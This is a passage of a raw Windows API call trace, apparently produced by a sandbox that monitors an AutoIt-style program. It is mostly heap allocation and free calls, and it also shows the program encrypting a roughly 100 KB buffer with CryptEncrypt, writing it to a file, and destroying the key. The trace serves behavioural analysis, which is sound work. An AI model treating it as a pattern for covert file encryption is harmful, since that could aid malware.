hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0088.547] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2700, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2700*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0088.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0088.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0088.550] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.551] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1880d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x18810) returned 1 [0088.551] CharLowerBuffW (in: lpsz="byte[100369]", cchLength=0xc | out: lpsz="byte[100369]") returned 0xc [0088.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.556] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b2820*, pdwDataLen=0x144e790*=0x1880d, dwBufLen=0x18810 | out: pbData=0x49b2820*, pdwDataLen=0x144e790*=0x18810) returned 1 [0088.556] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.558] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x18810, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x18810, lpOverlapped=0x0) returned 1 [0088.560] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0088.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca3b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0088.561] CryptDestroyKey (hKey=0x41ac640) returned 1 [0088.561] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.597] TranslateMessage (lpMsg=0x144efbc) returned 0 [0088.597] DispatchMessageW (lpMsg=0x144efbc) returned 0x0 [0088.597] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0088.597] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0088.597] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0088.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0088.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0088.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.597] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0088.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0088.598] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0088.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.598] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0088.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0088.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0088.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0088.599] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0088.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0088.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0088.600] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0088.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0088.600] RtlAllocateHeap 